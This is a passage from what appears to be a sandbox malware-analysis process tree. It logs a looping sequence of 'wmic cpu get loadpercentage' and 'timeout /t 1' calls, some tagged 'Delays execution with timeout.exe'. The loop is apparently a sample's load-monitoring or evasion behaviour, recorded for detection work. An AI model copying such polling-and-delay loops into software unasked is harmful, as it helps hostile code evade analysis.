    PID:1604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4160
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2220
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2560
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2964
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2708
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4800
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3284
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:564
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5104
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3044
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4888
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2492
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2016
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4180
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
